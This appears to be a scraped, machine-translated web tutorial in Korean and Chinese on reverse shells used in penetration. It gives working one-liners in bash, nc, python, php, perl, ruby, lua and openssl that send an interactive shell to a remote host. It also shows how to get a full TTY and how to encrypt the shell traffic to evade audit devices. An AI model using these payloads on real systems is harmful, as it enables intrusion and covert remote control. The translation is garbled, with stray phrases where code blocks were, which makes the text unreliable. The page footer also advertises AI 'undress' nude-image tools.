쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오
조개란 무엇인가요
Shell은 getshell, webshell, crash shell 등 침투에서 흔히 사용되는 용어로 모두 쉘과 관련이 있습니다.
Baidu Encyclopedia에서 설명하는 쉘:
컴퓨터 과학에서 Shell은 (코어와 구별하기 위해) Shell이라고도 하는데, 이는 “사용자에게 운영 인터페이스를 제공한다
”라는 뜻입니다.face” 소프트웨어(명령 구문 분석기)는 DOS 이상과 유사합니다
cmd.exe. 사용자 명령을 받은 후 해당 애플리케이션을 호출합니다.
간단히 말하면 사용자는 셸을 통해 운영 체제 커널의 서비스에 액세스합니다. 즉, 셸에서 커널까지 시스템 명령을 실행합니다.
getshell: 대상의 명령 실행 권한을 얻습니다
webshell: 웹 서비스를 통해 명령을 실행하는 웹사이트 사이드 도어 linux 커널 sprintf를 의미합니다
Dip 쉘: 명령줄의 입력 및 출력을 다른 호스트로 전송
왜 껍질을 버려야 할까요
1. 웹셸에서 명령을 실행할 때 상호 작용이 없습니다. 쉘링이나 기타 작업을 용이하게 하려면 쉘을 열어야 합니다.
2. 리바운드 쉘은 측면 도어를 추가하는 것과 동일합니다. 웹쉘이 발견되어 삭제되면 권한이 손실되지 않습니다.
Linux에서 셸을 충돌시키는 데 일반적으로 사용되는 방법
whereis 명령을 사용하여 대상에서 지원하는 콜백 기술을 확인합니다.
으아아아
bash가 쉘 충돌
Bash 콜백은 실제 전투에서 가장 많이 사용되는 방법입니다
으아아아
명령어를 분해하고 분석하세요:
1. bash는 로컬에서 bash를 여는 것을 의미합니다
2. /dev/tcp/는 Linux의 특수 장치입니다. 이 파일을 여는 것은 소켓 호출을 실행하고 소켓 연결을 구축하는 것과 같습니다.
3. >& 옆에 있는 /dev/tcp/ip/port 파일은 표준 출력 및 표준 오류 출력을 이 파일로 리디렉션하는 것을 의미하며, 이는 이를 원격 vps로 전달합니다.
4. 원격 vps가 도청을 위해 해당 포트를 열면 이 bash의 표준 출력과 표준 오류 출력을 받게 됩니다.nc 급락한 껍질
대상 호스트에 nc가 설치되어 있어야 합니다
으아아아
使用其他版本的nc
nc.traditional ip port -e /bin/sh
配合命名管线进行大跌:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
python大跌shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3
0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程
接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。
php大跌shell
须要php关掉safe_mode选项,才可以使用exec函数。
使用php的exec函数执行方式1大跌shell的命令
php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
使用php的fsockopen去大跌shell
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'
其它大跌方式
exec大跌
0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196
perl大跌
perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby大跌
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'
lua大跌
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i &3 2>&3');"
获取一个完全交互shell
通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。
一般存在以下缺点
因而有必要去获取一个完全交互的shell。
1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:
python -c 'import pty; pty.spawn("/bin/bash")'
隐藏
运行完后
2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:
stty raw -echo fg #将后台运行或挂起的任务切换到前台运行
3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。
reset export SHELL=bash export TERM=xterm-256color stty rows 54 columns 104
SSL流量加密
部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。
因而须要将原始流量使用openssl加密,绕开流量审计设备。
1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
2、vps使用OpenSSL窃听一个端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
3、目标主机执行回调加密shell
mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
大跌成功,成功接收到ssl流量加密的shell。
참고링크
위 내용은 쉘에 대한 심층적 이해: 침투 속 일반명사 분석 및 적용 시나리오의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

메모장++7.3.1
사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경

드림위버 CS6
시각적 웹 개발 도구

SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제











Linux에서 파일 및 폴더를 효율적으로 계산 : 포괄적 인 가이드 Linux에서 파일과 디렉토리를 빠르게 계산하는 방법을 아는 것은 시스템 관리자 및 대규모 데이터 세트를 관리하는 사람에게 중요합니다. 이 안내서는 Simple Command-L을 사용합니다

Linux/UNIX 시스템 관리에는 사용자 계정 및 그룹 멤버십을 효율적으로 관리하는 것이 중요합니다. 이를 통해 적절한 리소스 및 데이터 액세스 제어를 보장합니다. 이 자습서는 Linux 및 UNIX 시스템의 여러 그룹에 사용자를 추가하는 방법에 대해 자세히 설명합니다. 우리

Flatpak 응용 프로그램 권한 관리 도구 : Flatseal 사용자 안내서 Flatpak은 Linux 소프트웨어 배포 및 사용을 단순화하도록 설계된 도구입니다. 가상 샌드 박스의 애플리케이션을 안전하게 캡슐화하여 사용자는 시스템 보안에 영향을주지 않고 루트 권한없이 응용 프로그램을 실행할 수 있습니다. Flatpak 응용 프로그램은이 샌드 박스 환경에 있으므로 운영 체제의 다른 부분, 하드웨어 장치 (예 : Bluetooth, Network 등) 및 소켓 (예 : Pulseaudio, SSH-Auth, Cups 등)에 액세스하는 권한을 요청해야합니다. 이 안내서는 Linux에서 Flatseal을 사용하여 Flatpak을 쉽게 구성하는 방법을 안내합니다.

Linux 커널은 GNU/Linux 운영 체제의 핵심 구성 요소입니다. 1991 년 Linus Torvalds가 개발 한이 도시는 무료, 오픈 소스, 모 놀리 식, 모듈 식 및 멀티 태스킹 UNIX와 같은 커널입니다. Linux에서는 노래에 여러 커널을 설치할 수 있습니다.

이 간단한 가이드는 Linux 운영 체제에 Indian Rupee 기호를 입력하는 방법을 설명합니다. 다른 날, 나는 단어 문서에 "Indian Rupee Symbol (₹)을 입력하고 싶었습니다. 내 키보드에는 루피 기호가 있지만 입력하는 방법을 모르겠습니다. 후에

Linux는 서버 관리, 임베디드 시스템 및 데스크탑 환경으로 사용되는 것이 가장 좋습니다. 1) 서버 관리에서 Linux는 웹 사이트, 데이터베이스 및 응용 프로그램을 호스팅하는 데 사용되어 안정성과 안정성을 제공합니다. 2) 임베디드 시스템에서 Linux는 유연성과 안정성으로 인해 스마트 홈 및 자동차 전자 시스템에서 널리 사용됩니다. 3) 데스크탑 환경에서 Linux는 풍부한 응용 프로그램과 효율적인 성능을 제공합니다.

Linus Torvalds는 Linux Kernel 6.14 릴리스 후보 6 (RC6)을 출시하여 중대한 문제를보고하지 않고 릴리스를 추적했습니다. 이 업데이트에서 가장 주목할만한 변경 사항은 AMD 마이크로 코드 서명 문제를 해결하고 나머지 업데이트는

인터넷에서 좋아하는 비디오를 저장하고 싶었던 적이 있습니까? 재미있는 고양이 비디오이든 나중에보고 싶은 튜토리얼이든, YT-DLP는 여기에 있습니다! 이 포괄적 인 YT-DLP 튜토리얼에서는 YT-DLP가 무엇인지 설명 할 것입니다.
